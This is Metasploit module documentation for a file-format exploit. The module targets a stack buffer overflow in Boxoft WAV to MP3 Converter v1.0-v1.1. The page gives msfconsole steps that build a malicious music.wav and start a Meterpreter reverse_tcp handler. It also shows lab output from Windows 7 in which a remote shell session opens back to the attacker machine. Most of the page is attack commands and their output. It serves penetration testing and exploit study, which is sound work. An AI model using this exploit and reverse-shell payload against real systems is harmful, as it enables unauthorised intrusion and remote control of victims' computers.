
## Vulnerable Application

  This module exploits a stack-based buffer overflow in Boxoft WAV to MP3 Converter v1.0-v1.1. 

## Verification Steps

   1.  Install application on the target machine
   2.  Start msfconsole
   3.  Do: `use [exploit/multi/handler]`
   4.  Do: `set payload [windows/meterpreter/reverse_tcp]`
   5.  Do: `set LHOST [IP]`
   6.  Do: `run`
   7.  Do: `use [exploit/windows/fileformat/boxoft_wav_to_mp3]`
   8.  Do: `set payload [windows/meterpreter/reverse_tcp]`
   9.  Do: `set LHOST [IP]`
   10. Do: `run`
   11. Copy the generated file to the target machine
   12. Open Boxoft WAV to MP3 Converter
   13. Select `Next` at the bottom
   14. Select `Add`
   15. Browse to the file and select it
   16. Click `Convert to MP3`

   You should get a shell.

## Options

  **FILENAME**

  The filename that the shellcode gets written to. Setting a filename is not required, as there is a default name already set.

## Scenarios

### Tested on Windows 7 x86


  Run Exploit 

  ```
  msf5 > use exploit/windows/fileformat/boxoft_wav_to_mp3 
  msf5 exploit(windows/fileformat/boxoft_wav_to_mp3) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(windows/fileformat/boxoft_wav_to_mp3) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(windows/fileformat/boxoft_wav_to_mp3) > run

  [+] music.wav stored at /Users/space/.msf4/local/music.wav

  ```
  Set up Handler

  ```
  msf5 > use exploit/multi/handler
  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444 
  [*] Sending stage (179779 bytes) to 192.168.37.138
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.138:49178) at 2018-06-29 14:41:11 -0500

  meterpreter > sysinfo
  Computer        : WIN7-LAB
  OS              : Windows 7 (Build 7601, Service Pack 1).
  Architecture    : x86
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows

  ```
